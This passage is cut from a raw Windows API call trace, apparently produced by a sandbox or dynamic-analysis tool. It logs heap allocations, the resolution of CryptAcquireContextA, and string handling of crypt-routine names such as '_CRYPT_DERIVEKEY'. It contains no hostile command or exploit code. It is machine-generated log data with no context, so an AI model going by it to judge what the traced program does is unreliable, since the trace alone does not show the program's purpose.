hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0161.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0161.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0161.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0161.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0161.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0161.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0161.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0161.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0161.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0161.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0161.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0161.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0161.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0161.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0161.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0161.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0161.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0161.683] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0161.683] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0161.683] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0161.683] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0161.683] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0161.683] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0161.683] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0161.683] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2e69988, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0161.683] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0161.683] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54530 [0161.683] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0161.683] GetProcAddress (hModule=0x756e0000, lpProcName="CryptAcquireContext") returned 0x0 [0161.683] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54530 | out: hHeap=0x970000) returned 1 [0161.684] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0161.684] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0161.684] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fe30 [0161.684] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0161.684] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0161.684] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0161.684] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x15) returned 0x2e69b08 [0161.684] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2e69b08, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0161.684] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0161.684] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541c0 [0161.684] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0161.684] GetProcAddress (hModule=0x756e0000, lpProcName="CryptAcquireContextA") returned 0x756ffc40 [0161.684] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541c0 | out: hHeap=0x970000) returned 1 [0161.684] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0161.684] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fe30 | out: hHeap=0x970000) returned 1 [0161.684] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0161.684] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b28 [0161.685] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0161.685] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0161.685] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0161.685] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0161.685] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0161.685] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0161.685] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0161.685] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0161.685] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0161.685] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0161.685] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b28 | out: hHeap=0x970000) returned 1 [0161.685] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0xa5f958) returned 1 [0161.686] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0161.686] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0161.686] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0161.687] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0161.687] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0161.687] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0161.687] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0161.687] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0161.687] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0161.687] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0161.687] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0161.687] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0161.687] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0161.687] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0161.687] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0161.687] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0161.687] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0161.687] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0161.687] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0161.687] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0161.687] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0161.687] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0161.687] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0161.687] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0161.687] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0161.688] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0161.688] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0161.688] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0161.688] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0161.688] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0161.688] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0161.688] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0161.688] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0161.688] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0161.688] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0161.688] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0161.688] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0161.688] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0161.688] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0161.688] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0161.688] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0161.688] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e558d8 [0161.688] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0161.688] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 [0161.689] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0161.689] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0161.689] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0161.689] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b78 [0161.689] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0161.689] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fd50 [0161.689] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b68 [0161.689] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0161.689] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0161.689] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 [0161.689] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0161.689] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0161.689] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0161.689] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0161.689] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fca8 [0161.689] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54be8 [0161.689] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0161.689] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0161.690] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 [0161.690] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0161.690] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0161.690] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 [0161.690] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0161.690] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77688 [0161.690] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0161.690] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 [0161.690] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0161.690] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0161.690] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0161.690] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0161.690] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fd50 [0161.690] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b68 [0161.690] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0161.690] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0161.690] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0161.690] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ba8 [0161.690] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0161.690] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0161.690] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bb8 [0161.690] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540a8 [0161.691] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0161.691] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bc8 [0161.691] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0161.691] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0161.691] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0161.691] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0161.691] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ba8 [0161.691] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0161.691] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0161.691] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ba8 [0161.691] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0161.691] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0161.691] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0161.691] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544b8 [0161.691] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0161.691] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0161.691] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0161.691] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0161.691] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0161.691] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0161.691] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ba8 [0161.691] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0161.692] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0161.692] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0161.692] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54260 [0161.692] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0161.692] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0161.692] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0161.692] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0161.692] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0161.692] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0161.692] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ba8 [0161.692] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0161.692] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0161.692] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0161.692] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54508 [0161.692] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0161.692] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0161.692] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0161.692] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0161.692] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0161.692] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54148 [0161.692] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ba8 [0161.692] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0161.692] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0161.692] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0161.693] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fd50 [0161.693] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0161.693] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0161.693] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0161.693] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0161.693] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0161.693] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0161.693] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0161.693] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80178 [0161.693] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ba8 [0161.693] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0161.693] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0161.693] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0161.693] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0161.693] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0161.693] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0161.693] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0161.693] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0161.693] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0161.693] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0161.693] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0161.694] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0161.694] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0161.694] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fdf8 [0161.694] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0161.694] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0161.694] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0161.694] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0161.694] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0161.694] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0161.694] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0161.694] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0161.694] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0161.694] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0161.694] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0161.694] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, 